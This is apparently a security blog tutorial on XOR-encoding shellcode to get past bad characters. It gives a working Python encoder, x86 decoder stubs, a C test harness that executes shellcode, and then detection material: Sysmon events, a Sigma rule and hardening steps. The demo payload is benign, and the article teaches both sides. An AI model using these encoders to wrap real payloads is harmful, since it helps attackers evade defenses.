Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars

By Debraj Basak · Jun 20, 2026 · 14 min read · Exploit Development

You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.

This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.


1. Why Shellcode Breaks: Bad Characters

A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.

| Byte | Name | Why it breaks things |
|---|---|---|
| \x00 | NULL | Terminates C strings; strcpy/sprintf stop copying here |
| \x0a | Line Feed | Read as end-of-input by line-oriented protocols and gets() |
| \x0d | Carriage Return | Paired with \x0a in HTTP/SMTP headers; often stripped |
| \x20 | Space | Token delimiter in many parsers |
| \xff | 0xFF | Sentinel / length markers in some binary protocols |

The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).
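
To make the per-target point concrete, here is a minimal sketch that reports which bytes of a payload collide with a given bad-char set. The helper name `bad_positions` and both example sets are illustrative assumptions, not measurements from a real target.

```python
def bad_positions(payload: bytes, bad: set) -> list:
    """Return (offset, byte) pairs for every payload byte that is in `bad`."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

# Benign exit(0) stub used throughout this article.
payload = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])

# Two hypothetical targets with different constraints (assumed, not measured).
c_string_target = {0x00, 0x0a, 0x0d}          # strcpy-style, line-oriented
seven_bit_target = set(range(0x80, 0x100))    # path that only carries 7-bit ASCII

for name, bad in [("c_string", c_string_target), ("seven_bit", seven_bit_target)]:
    hits = bad_positions(payload, bad)
    print(name, [(i, hex(b)) for i, b in hits])
```

The same eight bytes are clean for one target and mostly unusable for the other, which is why the list has to be measured rather than assumed.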


2. The XOR Contract

XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.

A ⊕ K ⊕ K = A

| A | K | A ⊕ K |
|---|---|---|
| 0 | 0 | 0 |
| 0 | 1 | 1 |
| 1 | 0 | 1 |
| 1 | 1 | 0 |

There’s no key schedule, no S-box, no state to carry, which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in about 20 bytes (the JMP-CALL-POP stub in Section 5 is exactly 20). That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.

The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character — for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. And if the encoded output ever lands on \x00, that’s a bad char too; re-key.
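
The contract is easy to check by hand. The sketch below verifies the self-inverse property for every key and then turns the rule around: since original ⊕ K = bad exactly when K = original ⊕ bad, the set of unusable keys can be computed directly. The names `xor_bytes` and `forbidden_keys` are made up for this illustration.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of `data` with a single-byte key."""
    return bytes(b ^ key for b in data)

# Self-inverse: encoding twice with the same key restores the input.
every_byte = bytes(range(256))
for key in range(256):
    assert xor_bytes(xor_bytes(every_byte, key), key) == every_byte

# One-bit truth table as (A, K, A xor K).
truth_table = [(a, k, a ^ k) for a in (0, 1) for k in (0, 1)]
print(truth_table)

def forbidden_keys(payload: bytes, bad: set) -> set:
    """Keys that would turn at least one payload byte into a bad char."""
    return {b ^ bc for b in payload for bc in bad}

payload = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # exit(0)
blocked = forbidden_keys(payload, {0x00, 0x0a, 0x0d})
print(sorted(hex(k) for k in blocked))
```

Any key outside `blocked` (and outside the bad-char set itself) is usable, so a key search is really a set-membership test.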


[Figure: flow diagram showing shellcode going through key search and XOR encoding, crossing a hostile transport layer, then being decoded by the stub and executed on the target.]
XOR encoding and decoding are symmetric operations: the same key byte transforms the payload in both directions, so only a tiny stub is needed at runtime.

3. Finding the Bad Chars

Before you encode anything, you enumerate what to avoid. The workflow is mechanical:

  1. Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
  2. Drop it into the vulnerable buffer and dump the buffer from memory.
  3. Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
  4. Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.

A small diff helper makes step 3 fast:

#!/usr/bin/env python3
# Bad-char scanner: compare what you sent vs. what landed in memory.
def first_bad(expected: bytes, received: bytes):
    for i, (e, r) in enumerate(zip(expected, received)):
        if e != r:
            return i, hex(e), hex(r)          # index, sent, received
    if len(expected) != len(received):
        return min(len(expected), len(received)), "(truncated)", None
    return None

# expected = bytes(range(0x01, 0x100))        # full pattern minus \x00
# received = open("dump.bin","rb").read()
# print(first_bad(expected, received))

Truncation tells you something extra: the first byte that failed to arrive (the one at the index where the copy stopped) is usually the terminator. Note it, exclude it, run again.
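
The whole loop can be rehearsed offline before touching a target. In this sketch `simulated_transport` is a hypothetical stand-in that truncates at the first bad byte, the way a strcpy-style copy would; a real run replaces it with "send the pattern, dump the buffer".

```python
def simulated_transport(data: bytes, truly_bad: set) -> bytes:
    """Hypothetical stand-in for the target: the copy stops at the first bad byte."""
    for i, b in enumerate(data):
        if b in truly_bad:
            return data[:i]
    return data

def discover_bad_chars(send, known_bad=()):
    """Repeat steps 1-4 until the whole pattern survives; return the bad set."""
    bad = set(known_bad)
    while True:
        pattern = bytes(b for b in range(256) if b not in bad)
        received = send(pattern)
        if received == pattern:
            return bad
        # Index of the first mismatch, or of the first missing byte on truncation.
        idx = next((i for i, (e, r) in enumerate(zip(pattern, received)) if e != r),
                   min(len(pattern), len(received)))
        if idx >= len(pattern):
            raise ValueError("received more data than was sent")
        bad.add(pattern[idx])

found = discover_bad_chars(lambda p: simulated_transport(p, {0x00, 0x0a, 0x0d}))
print(sorted(hex(b) for b in found))
```

Each pass finds exactly one bad byte, so a target with three bad chars takes four round trips: three failures and one clean run.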


4. Building an XOR Encoder in Python

The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.

#!/usr/bin/env python3
# XOR shellcode encoder — teaching / authorized-lab use only.

# Benign x86 stub: exit(0)  (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
bad_chars = {0x00, 0x0a, 0x0d}

def find_key(sc, bad):
    for key in range(1, 256):
        if key in bad:
            continue
        if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
            return key
    return None

key = find_key(shellcode, bad_chars)
if key is None:
    raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

encoded = bytes(b ^ key for b in shellcode)
print(f"[+] key   = {hex(key)}")
print(f"[+] length = {len(encoded)}")
print("[+] blob  = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean — you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.
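
To see both outcomes side by side, the sketch below lists every clean key instead of stopping at the first, then builds a deliberately over-constrained case. `clean_keys` is a hypothetical helper that applies the same test as find_key.

```python
def clean_keys(sc: bytes, bad: set) -> list:
    """All single-byte keys that are not bad and produce no bad encoded byte."""
    return [k for k in range(1, 256)
            if k not in bad and all((b ^ k) not in bad for b in sc)]

shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # exit(0)
bad_chars = {0x00, 0x0a, 0x0d}

keys = clean_keys(shellcode, bad_chars)
print("first clean key:", hex(keys[0]), "| candidates:", len(keys))

# Round-trip check: decoding with the same key must restore the original.
for k in keys:
    encoded = bytes(b ^ k for b in shellcode)
    assert bytes(b ^ k for b in encoded) == shellcode

# Over-constrained case: a payload containing every byte value can never
# avoid \x00, because byte k XOR key k is always zero.
print("keys for all-256 payload:", clean_keys(bytes(range(256)), {0x00}))
```

The second case is contrived, but it shows the mechanism: the more distinct byte values a payload contains, the more keys each bad char rules out.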


5. The Decoder Stub in x86 (NASM)

The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.

section .text
global _start

_start:
    jmp short get_payload      ; (1) hop over the decoder to the CALL

decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

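Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len silently truncates anything over 255 bytes, so a 300-byte payload decodes only its first 44 bytes (300 mod 256) and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, keep the xor ecx, ecx and load the 16-bit register instead: mov cx, payload_len. A full mov ecx, payload_len also works and needs no prior clearing, but its 32-bit immediate contains \x00 bytes for any realistic length, which puts a bad char straight back into the stub.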
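
The truncation is plain modular arithmetic, sketched here in Python. `loop_iterations` is a made-up name; it models only the counter, assuming ECX was zeroed before the mov cl.

```python
def loop_iterations(payload_len: int) -> int:
    """Iterations of `loop` after `xor ecx, ecx` then `mov cl, payload_len`."""
    ecx = payload_len & 0xFF      # only the low 8 bits reach CL
    # `loop` decrements before testing, so ECX == 0 wraps to 0xFFFFFFFF
    # and the loop runs 2**32 times instead of zero.
    return ecx if ecx else 2**32

for n in (8, 255, 256, 300):
    print(n, loop_iterations(n))
```

Note the 256-byte case: the low byte is zero, so the decoder does not stop early, it runs off the end of the buffer instead.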

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

<figure class="gxc-figure">
  <img src="https://genxcyber.com/wp-content/uploads/2026/06/shellcode-xor-encoding-custom-decoders-bad-chars-2-scaled.png" alt="Flow diagram of the JMP-CALL-POP technique showing how a forward JMP reaches a CALL that pushes the payload address, POP captures it into ESI, and the decode loop XORs each byte before jumping into the now-decoded shellcode" loading="lazy" />
  <figcaption>JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.</figcaption>
</figure>

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM, never on your host and never networked:

/* LAB ONLY: disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */
#include <stdio.h>
unsigned char buf[] =
    "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
    "\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}
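
Before running anything, it is worth checking that the branch displacements in those stub bytes land where the labels say they should. This sketch recomputes the four targets from the raw bytes; the helper names are invented for the example, and the offsets are read off the byte string in the C harness.

```python
# Stub bytes copied from the C harness (payload not included).
stub = bytes.fromhex("eb0d" "5e" "31c9" "b108" "8036aa" "46" "e2fa" "eb05" "e8eeffffff")

def rel8_target(code: bytes, off: int) -> int:
    """Target of a 2-byte short branch (opcode + signed 8-bit displacement)."""
    disp = int.from_bytes(code[off + 1:off + 2], "little", signed=True)
    return off + 2 + disp

def rel32_target(code: bytes, off: int) -> int:
    """Target of a 5-byte near call (0xE8 + signed 32-bit displacement)."""
    disp = int.from_bytes(code[off + 1:off + 5], "little", signed=True)
    return off + 5 + disp

print(hex(rel8_target(stub, 0x00)))   # jmp short get_payload
print(hex(rel8_target(stub, 0x0b)))   # loop decode_loop
print(hex(rel8_target(stub, 0x0d)))   # jmp payload
print(hex(rel32_target(stub, 0x0f)))  # call decoder
```

The jmp payload target equals the stub length, meaning the payload must start immediately after the last stub byte; the call lands on the pop esi at offset 2.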

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax (\x29\xc0), which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9 → sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.
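
That mental table can also live in code. The sketch below holds only the two substitutions named above and picks the first encoding that avoids the bad-char set; the `EQUIVALENTS` table and `pick_clean` helper are illustrative, and a real table would be much longer.

```python
# Intent -> list of (assembly text, machine code) with identical effect.
EQUIVALENTS = {
    "zero eax": [("xor eax, eax", b"\x31\xc0"), ("sub eax, eax", b"\x29\xc0")],
    "zero ecx": [("xor ecx, ecx", b"\x31\xc9"), ("sub ecx, ecx", b"\x29\xc9")],
}

def pick_clean(intent: str, bad: set):
    """Return the first equivalent whose bytes avoid `bad`, or None."""
    for asm, encoding in EQUIVALENTS[intent]:
        if not any(b in bad for b in encoding):
            return asm, encoding
    return None

print(pick_clean("zero eax", {0x00}))          # default form is fine
print(pick_clean("zero eax", {0x00, 0x31}))    # falls back to sub
print(pick_clean("zero ecx", {0x31, 0x29}))    # nothing in this table survives
```

A None result means the table needs another entry for that intent, not that the target is unexploitable.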


7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

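; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
; Entry: ESI -> first key byte. Decoded bytes are compacted over the blob
; (EDI trails ESI), so no key byte is left inside the executable stream.
    mov   edi, esi             ; EDI = write cursor, starts at the blob
decode_chunk:
    mov   bl, [esi]            ; BL = key for this chunk
    inc   esi                  ; ESI -> data byte 0
    mov   al, [esi]            ; fetch data byte 0
    xor   al, bl               ; decode it
    mov   [edi], al            ; store at the write cursor
    inc   esi
    inc   edi
    mov   al, [esi]            ; fetch data byte 1
    xor   al, bl               ; decode it
    mov   [edi], al            ; store at the write cursor
    inc   esi
    inc   edi
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; label at the blob start = first decoded byte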

| Scheme | Pro | Con |
|---|---|---|
| Fixed single key | Smallest stub; one xor per byte | Fails when bad-char set is dense |
| Per-chunk key | Survives tight bad-char sets | Larger blob (one key byte per chunk); bigger stub |

The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.
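
The encoder side of this layout is a small extension of the single-key search. What follows is a sketch under stated assumptions: two-byte chunks, 0x90 as the marker, and a payload whose length is a multiple of the chunk size. `encode_chunks` and `decode_chunks` are hypothetical names, and the decoder is a Python model of the layout, not the assembly.

```python
MARKER = 0x90   # raw end-marker, never used as a key
CHUNK = 2       # data bytes per chunk (assumed)

def encode_chunks(sc: bytes, bad: set) -> bytes:
    """Emit [key][d0][d1]...[marker], choosing a clean key per chunk."""
    if MARKER in bad or len(sc) % CHUNK:
        raise ValueError("marker is a bad char or payload is not chunk-aligned")
    out = bytearray()
    for i in range(0, len(sc), CHUNK):
        chunk = sc[i:i + CHUNK]
        key = next((k for k in range(1, 256)
                    if k != MARKER and k not in bad
                    and all((b ^ k) not in bad for b in chunk)), None)
        if key is None:
            raise ValueError(f"no clean key for chunk at offset {i}")
        out.append(key)
        out.extend(b ^ key for b in chunk)
    out.append(MARKER)
    return bytes(out)

def decode_chunks(blob: bytes) -> bytes:
    """Model of the decoder: read key, decode CHUNK bytes, stop at the marker."""
    out, i = bytearray(), 0
    while blob[i] != MARKER:
        key = blob[i]
        out.extend(b ^ key for b in blob[i + 1:i + 1 + CHUNK])
        i += 1 + CHUNK
    return bytes(out)

shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # exit(0)
blob = encode_chunks(shellcode, {0x00, 0x0a, 0x0d})
print(blob.hex(), decode_chunks(blob) == shellcode)
```

The marker is only ever compared at key positions, which is why excluding it from the key search is enough; an encoded data byte equal to 0x90 is harmless.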


8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
    sub   esp, 0x200           ; reserve 512 bytes of scratch
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catches: sub esp must reserve enough room, the marker can’t collide with an encoded byte, and sub esp, 0x200 itself assembles to 81 ec 00 02 00 00, so the stub carries \x00 bytes until you substitute that instruction (Section 6). This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest: you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).
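
Both constraints are easy to check before assembling anything. This Python model mirrors the copy-decode loop and refuses to build a blob whose encoded bytes collide with the marker. The key 0xAA, marker 0xCC and 0x200-byte scratch size come from the listing; the function names are assumptions for the sketch.

```python
def build_blob(sc: bytes, key: int = 0xAA, marker: int = 0xCC) -> bytes:
    """Encode and append the raw marker; reject marker collisions."""
    encoded = bytes(b ^ key for b in sc)
    if marker in encoded:
        raise ValueError("marker collides with an encoded byte; pick another")
    return encoded + bytes([marker])

def copy_decode(blob: bytes, key: int = 0xAA, marker: int = 0xCC,
                scratch_size: int = 0x200) -> bytes:
    """Model of copy_decode: source is left untouched, output goes to scratch."""
    scratch = bytearray(scratch_size)
    edx = 0
    while blob[edx] != marker:          # marker is checked before decoding
        if edx >= scratch_size:
            raise OverflowError("scratch buffer too small for payload")
        scratch[edx] = blob[edx] ^ key
        edx += 1
    return bytes(scratch[:edx])

shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # exit(0)
blob = build_blob(shellcode)
print(copy_decode(blob) == shellcode)
```

A payload byte of 0x66 would encode to 0xCC under this key and stop the decoder early, which is the collision `build_blob` guards against.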


9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

  • Chained, self-modifying key. The decoder works on 4-byte blocks, and each decoded block is fed back into the key used for the next. Get one block or the initial key wrong and the whole tail decodes to noise, which also frustrates partial emulation.
  • Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is obfuscated, using FPU instructions like fnstenv [esp-0xc] to recover EIP without a tell-tale CALL, which also trips up emulators that don’t model the FPU.

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.
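
The feedback idea is simple enough to model in a few lines. What follows is a toy additive-feedback XOR over 4-byte blocks, written to show the chaining property only; it is not Metasploit's implementation, and the function names, padding choice and starting key are all assumptions.

```python
import struct

MASK = 0xFFFFFFFF

def feedback_encode(data: bytes, key: int) -> bytes:
    """XOR each 4-byte block with the key, then add the plaintext to the key."""
    data += b"\x90" * (-len(data) % 4)        # pad to a block boundary
    out = bytearray()
    for (plain,) in struct.iter_unpack("<I", data):
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & MASK
    return bytes(out)

def feedback_decode(blob: bytes, key: int) -> bytes:
    """Inverse: recover the plaintext block, then update the key the same way."""
    out = bytearray()
    for (enc,) in struct.iter_unpack("<I", blob):
        plain = enc ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK
    return bytes(out)

payload = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # exit(0)
blob = feedback_encode(payload, 0x1337C0DE)
print(feedback_decode(blob, 0x1337C0DE) == payload)

# Flip one bit in the first block: every later block now decodes wrong.
damaged = bytearray(blob)
damaged[0] ^= 0x01
print(feedback_decode(bytes(damaged), 0x1337C0DE)[4:] == payload[4:])
```

The second check comes back False: a single flipped bit changes the recovered first block, which changes the key for every block after it.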


10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

| Behavior | What it reveals |
|---|---|
| Tight xor/inc/loop over a code region | Classic fixed-key decoder stub |
| Region transitions writable → executable | Decoded payload about to run |
| Execution from unbacked memory | Code with no file on disk behind it |
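
The first row is the only one that can be matched statically. As a minimal sketch, the scanner below looks for the exact xor byte [esi], imm8 / inc esi / loop sequence from Section 5 in a byte buffer. It is deliberately narrow: another register, a reordered loop or any polymorphic encoder will not match, which is the argument for the behavioral rows. `find_xor_loops` is a made-up name.

```python
import re

# 80 36 ib = xor byte [esi], imm8 ; 46 = inc esi ; e2 cb = loop rel8
STUB_RE = re.compile(rb"\x80\x36(.)\x46\xe2(.)", re.DOTALL)

def find_xor_loops(buf: bytes) -> list:
    """Return (offset, key) for each fixed-key ESI decode loop found in buf."""
    return [(m.start(), m.group(1)[0]) for m in STUB_RE.finditer(buf)]

# The 20-byte stub from the C harness, surrounded by filler.
stub = bytes.fromhex("eb0d5e31c9b1088036aa46e2faeb05e8eeffffff")
sample = b"\x41" * 16 + stub + b"\x42" * 16

for offset, key in find_xor_loops(sample):
    print(f"decode loop at offset {offset:#x}, key {key:#04x}")
```

Recovering the key this way also lets an analyst decode the trailing blob offline without ever executing it.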

Sysmon Event IDs

| Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Loader/injector process spawn |
| 7 | Image Loaded | DLLs from temp/download paths into system processes |
| 8 | CreateRemoteThread | Thread created in another process (low-volume, high-signal) |
| 10 | ProcessAccess | Cross-process memory access; inspect GrantedAccess and CallTrace |
| 25 | ProcessTampering | In-memory image diverges from disk (hollowing / in-memory decode) |

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.
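
For triage outside a SIEM, the same selection logic can be applied to exported events. This sketch assumes each Sysmon Event ID 10 record has already been parsed into a dict keyed by field name; the sample events are invented for illustration and `matches_rule` is a hypothetical helper.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}

def matches_rule(event: dict) -> bool:
    """Mirror the Sigma selection: GrantedAccess in list AND CallTrace contains UNKNOWN."""
    access = str(event.get("GrantedAccess", "")).lower()
    trace = str(event.get("CallTrace", "")).lower()   # Sigma string matches ignore case
    return access in SUSPICIOUS_ACCESS and "unknown" in trace

# Invented sample records, shaped like parsed Event ID 10 fields.
events = [
    {"SourceImage": "C:\\lab\\loader.exe", "GrantedAccess": "0x1F3FFF",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|UNKNOWN(000001A2B3C4D5E6)"},
    {"SourceImage": "C:\\Windows\\System32\\svchost.exe", "GrantedAccess": "0x1000",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4"},
]

for ev in events:
    print(ev["SourceImage"], "->", "ALERT" if matches_rule(ev) else "ok")
```

Both conditions must hold: high access rights alone are common for legitimate tooling, and it is the unbacked caller that makes the event interesting.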

ETW providers

| Provider | Purpose |
|---|---|
| Microsoft-Windows-Threat-Intelligence | Kernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs |
| Microsoft-Windows-Security-Auditing | Event ID 4688 process creation with command line |
| AMSI | Inspects script content after deobfuscation, before execution |

Hardening

  • bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
  • Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
  • Code Integrity Guard (CIG) via ProcessSignaturePolicy — blocks unsigned image loads.
  • Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
  • Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

[Figure: hierarchy diagram showing behavioral indicators branching into RWX self-modifying memory and unbacked execution, each feeding into corresponding telemetry sources and hardening controls.]
Defenders shift focus from ever-changing encoded bytes to stable behavioral signals: self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

| Tool | Description | Link |
|---|---|---|
| NASM | Assemble x86/x64 decoder stubs | nasm.us |
| GDB + pwndbg | Single-step the decode loop, inspect ESI/ECX | gdb.gnu.org |
| objdump / objcopy | Disassemble stubs, extract .text bytes | gnu.org |
| Capstone | Programmatic opcode audit for bad chars | capstone-engine.org |
| pwntools | Encoder/exploit automation (pwnlib.encoders) | docs.pwntools.com |
| pe-sieve / Moneta | Scan live processes for RWX / unbacked memory | github.com |
| Sysmon | Endpoint telemetry for Event IDs 8, 10, 25 | learn.microsoft.com |

12. MITRE ATT&CK Mapping

| Technique | MITRE ID | Detection |
|---|---|---|
| Obfuscated Files or Information | T1027 | Entropy/structure anomalies; encoded blob with decoder prefix |
| Encrypted/Encoded File | T1027.013 | Static scan for XOR-loop stub patterns near high-entropy data |
| Deobfuscate/Decode Files or Information | T1140 | Self-modifying memory; ACG violations; ETW VirtualProtect |
| Process Injection | T1055 | Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN |
| PE Injection | T1055.002 | Shellcode written into another process; RWX region creation |
| Reflective Code Loading | T1620 | Execution from unbacked memory; pe-sieve / Moneta |
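
One caveat on the entropy column: a single-byte XOR only relabels byte values, so the byte-frequency distribution and its Shannon entropy are unchanged. The sketch below demonstrates that with the exit(0) payload; `shannon_entropy` is a generic helper written for this example, not taken from any detection product.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, 8.0 maximum)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

payload = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])  # exit(0)
encoded = bytes(b ^ 0xAA for b in payload)

print(f"plain   : {shannon_entropy(payload):.3f} bits/byte")
print(f"encoded : {shannon_entropy(encoded):.3f} bits/byte")
print(f"uniform : {shannon_entropy(bytes(range(256))):.3f} bits/byte")
```

Entropy becomes a useful signal for multi-byte or feedback-keyed encoders; for the fixed-key case, the decoder prefix and the behavior are the better tells.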

Summary

  • XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
  • The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
  • The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
  • Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
  • Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.
